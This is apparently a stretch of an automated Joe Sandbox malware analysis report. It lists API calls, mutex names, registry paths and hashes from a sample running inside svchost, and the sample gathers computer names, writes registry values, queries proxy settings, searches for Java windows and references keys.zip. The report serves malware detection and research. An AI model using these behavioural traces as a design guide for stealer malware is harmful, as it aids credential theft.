                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02663BE8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D098,?,02663D9C), ref: 02663C57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: keys.zip$path1.txt
                                                                                                                                                                                                              • API String ID: 1373881290-1274251082
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02665124
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02665133
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0266513A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02665152
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02665169
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 0266516F
                                                                                                                                                                                                                • Part of subcall function 026541E0: GetProcessHeap.KERNEL32(00000008,02665097,00000000,76DC34D0,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 026541FE
                                                                                                                                                                                                                • Part of subcall function 026541E0: HeapAlloc.KERNEL32(00000000,?,?,02665084,00000104,?,?,?,?,00000000,00000000), ref: 02654205
                                                                                                                                                                                                                • Part of subcall function 026541E0: memset.MSVCRT ref: 02654215
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02665190
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026651B7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 026651CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 02665100
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                              • API String ID: 734199406-1705633369
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 026474A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02654E91,?,00000000), ref: 026474C6
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 026474E4
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02654E91,?,00000000,?,?,00000000), ref: 0264750D
                                                                                                                                                                                                                • Part of subcall function 026474A0: RtlAllocateHeap.NTDLL(00000000,?,?,02654E91,?,00000000,?,?,00000000), ref: 02647514
                                                                                                                                                                                                                • Part of subcall function 026474A0: memset.MSVCRT ref: 02647527
                                                                                                                                                                                                                • Part of subcall function 026474A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02647553
                                                                                                                                                                                                                • Part of subcall function 026474A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02647563
                                                                                                                                                                                                                • Part of subcall function 026474A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02647572
                                                                                                                                                                                                                • Part of subcall function 026474A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02647585
                                                                                                                                                                                                                • Part of subcall function 026474A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02647594
                                                                                                                                                                                                                • Part of subcall function 026474A0: HeapValidate.KERNEL32(00000000), ref: 0264759B
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 026653BE
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 026653D2
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,026556AF), ref: 026653E3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 026653F3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,026556AF), ref: 02665430
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,026556AF), ref: 02665433
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,026556AF), ref: 02665440
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,026556AF), ref: 02665443
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1866686876-3277137149
                                                                                                                                                                                                              • Opcode ID: 6bfd5cf945412f9c08872f37c837e839a788082183c3f9a9d4fa9ca1e20fc5bf
                                                                                                                                                                                                              • Instruction ID: a34ef20a193ff661689dd74bc66c4a0226af0637c5c11353e331fe44eb0a200d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6bfd5cf945412f9c08872f37c837e839a788082183c3f9a9d4fa9ca1e20fc5bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D110831A812007BD710ABB59C4DFAF7BACFF45725F818A14F807E2240DB72D500C6A2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 0266440C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02664422
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02664430
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02664439
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02664451
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02664463
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0269D19C), ref: 0266446E
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,0269D19C,VEFK), ref: 02664488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK
                                                                                                                                                                                                              • API String ID: 849374196-3911370694
                                                                                                                                                                                                              • Opcode ID: 8a354b2a5a418de59f23d81488e81846dca1db630a9cb0a58c86332b981fed48
                                                                                                                                                                                                              • Instruction ID: 4d8a8e1dee034da91eb17fb99ad4c81e564dbee9f77783e821082287bcc47870
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a354b2a5a418de59f23d81488e81846dca1db630a9cb0a58c86332b981fed48
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7016832AC53107BF33167A59C4BF2EB38CDF44B10F424715FE05A62809FE4A8004ABA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0268A450), ref: 02660121
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0268A488), ref: 02660131
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0268A4B8), ref: 02660141
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,0268A4D8), ref: 02660151
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0268A450), ref: 02660161
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0268A488), ref: 02660171
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0268A4B8), ref: 02660181
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,0268A4D8), ref: 02660191
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindWindow
                                                                                                                                                                                                              • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                              • API String ID: 134000473-1757792087
                                                                                                                                                                                                              • Opcode ID: 329ec0ef929732303a05a268432342f7f7341597cc9e4266bc9df5d7f8e8bfd9
                                                                                                                                                                                                              • Instruction ID: eb20bc83f9ab872d6d7e1fdc4e8363664e7cffb2dd483c68314080d5769a5d3c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 329ec0ef929732303a05a268432342f7f7341597cc9e4266bc9df5d7f8e8bfd9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60F007957C236AACFE1071E96D1EF797B945B90D8DB414323BC46B5105E6849C4205F2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 026632DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 026632E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 026632F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0266330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02663316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A277,RFK), ref: 02663330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02663336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 8A99A277$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-1512082180
                                                                                                                                                                                                              • Opcode ID: 85d8cef2e71694cef9730caf4d8ee067a04b240715685ae9403f64638168ae16
                                                                                                                                                                                                              • Instruction ID: 6dd724582e6eb57944e46c6ed67e84346552741767d40331bc65d434eca8c683
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85d8cef2e71694cef9730caf4d8ee067a04b240715685ae9403f64638168ae16
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F0F470AC53407AF31067908C8EF6E7B9C6F48F00F854644FA03A2280DFA068618AB7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 0265B91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265B925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265B939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265B94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8a99a6dd), ref: 0265B956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8a99a6dd,ALPHA), ref: 0265B970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265B976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: 8a99a6dd$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                              • API String ID: 4280258085-1784723349
                                                                                                                                                                                                              • Opcode ID: e57aacfa9686c1587912ceb3947da9df115ca0e59e2b8a8a7708c9eec5ce60ce
                                                                                                                                                                                                              • Instruction ID: 5515815c1820f2643ed8332b8a0950c6abb2d520160d6ffb59449bb1b61904c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e57aacfa9686c1587912ceb3947da9df115ca0e59e2b8a8a7708c9eec5ce60ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18F028306C93257BE70067608C5AF1E77ACAF0AB08F450604FA03A13C4EFE0A5118ABB
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 0265CBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 0265CBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0265CBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0265CBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0265CBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A689), ref: 0265CBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,8A99A689,BSS), ref: 0265CC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0265CC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: 8A99A689$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 3206501308-1856957256
                                                                                                                                                                                                              • Opcode ID: a7eb3e224586fc800020bc0172a1fdb2db34305af040383b4c5c02b2f15989a0
                                                                                                                                                                                                              • Instruction ID: 834f0c1541aef5b48793d6443868fc0819e62dc1191a8a914792f12bb664cffa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7eb3e224586fc800020bc0172a1fdb2db34305af040383b4c5c02b2f15989a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACF0F630AC9711BBE3216BA09D49F1E7B986F09F04F400B06FD12A1280DFB084548A67
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650071
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,?), ref: 0265008C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0265008F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 0265009C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0265009F
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 026500BC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000014), ref: 026500D9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 026500E0
                                                                                                                                                                                                              • memset.MSVCRT ref: 026500F0
                                                                                                                                                                                                              • memset.MSVCRT ref: 02650109
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,00000000,00000002), ref: 0265011C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3911349929-0
                                                                                                                                                                                                              • Opcode ID: 8811c749cfe208044e184de94cb1442e4f5eda1082fdfe2679dc27bd33c7b7e0
                                                                                                                                                                                                              • Instruction ID: 455ebd744cc460e5e3eb3c39cd6f1a4d9845aa8868030122d0ba39e0db8676e5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8811c749cfe208044e184de94cb1442e4f5eda1082fdfe2679dc27bd33c7b7e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D31D171A40215ABE720DB68DC88F5A77ACEF48710F058244FD099B381DB74E911CBF5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,-04D1F5C8,00000000,00000000,?,?,?,?), ref: 0264F404
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0264F40B
                                                                                                                                                                                                              • memset.MSVCRT ref: 0264F41B
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 0264F426
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,026856DC,?,02685E1C,-04D1F5C8,00000000,00000000,?), ref: 0264F4EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264F4F5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,00000000), ref: 0264F501
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0264F508
                                                                                                                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,02685E1C,-04D1F5C8,00000000,00000000,?), ref: 0264F52E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,-04D1F5C8,00000000,00000000,?,?,?,?), ref: 0264F55A
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 0264F55D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0264F56A
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0264F56D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1948005343-0
                                                                                                                                                                                                              • Opcode ID: d9e2bb3f9b673cc550735530ca073075064fd01716f1b3fd2ed1c7c7a37eb12c
                                                                                                                                                                                                              • Instruction ID: b30d9ed98c0c2be2d937e1631b6af6a16144c8e15baaee93af8f3ae2eac870a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9e2bb3f9b673cc550735530ca073075064fd01716f1b3fd2ed1c7c7a37eb12c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B161C272A00209ABDB24DF68DC84AAEBBA9FF94324F058259FD4597340DF71D951CBE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647B33
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647B4B
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,76F8F380), ref: 02647B6C
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,76F8F380), ref: 02647B92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,76F8F380), ref: 02647C1D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,76F8F380), ref: 02647C24
                                                                                                                                                                                                              • memset.MSVCRT ref: 02647C33
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,76F8F380), ref: 02647C63
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4158279268-3673152959
                                                                                                                                                                                                              • Opcode ID: 99d93d072a64a9f1d4ce1101e2d947022a6da43fdb68131c9b88f620db5e3b04
                                                                                                                                                                                                              • Instruction ID: 770e5c75e79287dd3d5f51af77395539f4312981570b7b5ff3fa64b64eb53244
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99d93d072a64a9f1d4ce1101e2d947022a6da43fdb68131c9b88f620db5e3b04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4541F77190015DAFEB15DF748C98AEEB7BDEB58304F4046ACE585D3240EB705F858BA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02654902
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0265491A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02654941
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,-0000000B,00000104), ref: 0265496F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(-091561A1,software\microsoft,00000000,00000102,00000000), ref: 026549CE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 026549FE
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 02654A0C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02654A1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
• Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminCloseFlushOpenUserValuelstrcpynmemsetstrstr
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1783443066-3673152959
                                                                                                                                                                                                              • Opcode ID: 61bec75bfab725c0dd79241ba5620d0e4c947bc1fec8ef1993b7eaa71ef1eaa8
                                                                                                                                                                                                              • Instruction ID: a76c79e291756a3a4fcb781705d6b62df39179bcf12269054a9816bf04f6e5a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 61bec75bfab725c0dd79241ba5620d0e4c947bc1fec8ef1993b7eaa71ef1eaa8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1931F631A44219ABDB26CF24DC49FEE7BB8AB45705F1446D4ED46AB240EBB09684CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2599802364.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2599802364.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(8A99A277), ref: 02662827
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02662867
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 02662871
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02662879
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0266288A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?), ref: 02662891
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 0266289E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmp
